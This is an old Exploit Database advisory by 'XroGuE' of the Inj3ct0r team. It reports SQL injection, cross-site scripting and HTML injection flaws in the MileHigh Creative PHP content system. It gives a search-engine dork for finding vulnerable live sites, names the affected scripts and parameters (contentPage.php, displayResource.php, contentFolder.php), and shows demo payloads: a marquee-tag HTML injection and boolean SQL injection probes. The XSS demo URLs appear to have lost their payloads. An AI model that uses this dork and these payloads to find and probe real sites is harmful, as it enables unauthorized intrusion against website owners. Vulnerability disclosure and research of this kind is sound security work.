MileHigh Creative – SQL Injection / Cross-Site Scripting / HTML Injection

• Exploit Database
• 8 阅读

• 作者： XroGuE
  日期： 2010-05-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12792/

• =======================================================================
  # MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
  =======================================================================
  1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  1 \ \____/ >> Exploit database separated by exploit 0
  0 \/___/ type (local, remote, DoS, etc.) 1
  1 1
  0 [+] Site : Inj3ct0r.com 0
  1 [+] Support e-mail : submit[at]inj3ct0r.com 1
  0 0
  1 #################################### 1
  0 I'm XroGuE member from Inj3ct0r Team 1
  1 #################################### 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  
  ########################################################################
  # Name: MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities
  # Vendor: http://www.milehighcreative.com
  # Date: 2010-05-29
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: (-_+)
  ########################################################################
  
  [+] Dork: inurl:"contentPage.php?id=" & inurl:"displayResource.php?id=" & ...
  intext:"Website by Mile High Creative"
  
  
  [+] Vulnerabilities:
  
  contentPage.php
  contentFolder.php
  displayResource.php
  
  
  [+] XSS InjecTion Vulnerability:
  
  
  [+] Demo:
  http://server/contentPage.php?id=
  http://server/displayResource.php?id=
  http://server/contentFolder.php?parentId=
  
  0R
  
  http://server/contentPage.php?id=
  http://server/displayResource.php?id=
  http://server/contentFolder.php?parentId=
  
  ########################################################################
  
  [+] HTML InjecTion Vulnerability:
  [+] Demo: http://server/contentPage.php?id=<marquee><font color=Blue size=15>XroGuE</font></marquee>
  
  ########################################################################
  
  [+] SQL InjecTion Vulnerability:
  [+] Demo: http://server/contentFolder.php?parentId=1+and+1=1 [and+1=2]
  
  
  ########################################################################